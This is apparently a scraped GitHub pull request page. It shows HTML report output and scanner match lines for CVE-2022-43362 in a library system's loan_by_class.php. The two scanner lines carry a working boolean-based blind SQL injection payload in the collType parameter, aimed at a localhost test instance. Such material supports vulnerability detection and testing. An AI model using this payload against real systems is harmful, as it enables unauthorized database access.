<table class="s-table table table-sm table-bordered"><tr><th class="dataListHeaderPrinted">Classification</th><th class="dataListHeaderPrinted">Jan</th><th class="dataListHeaderPrinted">Feb</th><th class="dataListHeaderPrinted">Mar</th><th class="dataListHeaderPrinted">Apr</th><th class="dataListHeaderPrinted">May</th><th class="dataListHeaderPrinted">Jun</th><th class="dataListHeaderPrinted">Jul</th><th class="dataListHeaderPrinted">Aug</th><th class="dataListHeaderPrinted">Sep</th><th class="dataListHeaderPrinted">Oct</th><th class="dataListHeaderPrinted">Nov</th><th class="dataListHeaderPrinted">Dec</th></tr><tr><td><strong>bbbb00</strong></td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><tr><td>bbbb00</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><tr><td>bbbb10</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><tr><td>bbbb20</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><tr><td>bbbb30</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><tr><td>bbbb40</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><tr><td>bbbb50</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><tr><td>bbbb60</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><tr><td>bbbb70</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><tr><td>bbbb80</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><tr><td>bbbb90</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td></table></div>
<div class="loader"></div>
<!-- block if we inside iframe -->
<script type="text/javascript">
    // if we are inside iframe
    jQuery(document).ready(function () {
          });
</script>
</body>
</html>
[CVE-2022-43362:word-1] [http] [high] http://localhost:8089/bulian/admin/modules/reporting/customs/loan_by_class.php?reportView=true&year=2002&class=bbbb&membershipType=a&collType=aaaa%27%20AND%203045=(SELECT%20(CASE%20WHEN%20(3045=3045)%20THEN%203045%20ELSE%20(SELECT%203726%20UNION%20SELECT%205145)%20END))--%20-
[CVE-2022-43362:status-2] [http] [high] http://localhost:8089/bulian/admin/modules/reporting/customs/loan_by_class.php?reportView=true&year=2002&class=bbbb&membershipType=a&collType=aaaa%27%20AND%203045=(SELECT%20(CASE%20WHEN%20(3045=3045)%20THEN%203045%20ELSE%20(SELECT%203726%20UNION%20SELECT%205145)%20END))--%20-

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Reviewers
No reviews
Assignees
No one assigned
Labels
None yet
Projects
None yet
Milestone
No milestone
Development

Successfully merging this pull request may close these issues.
1 participant
@nblirwn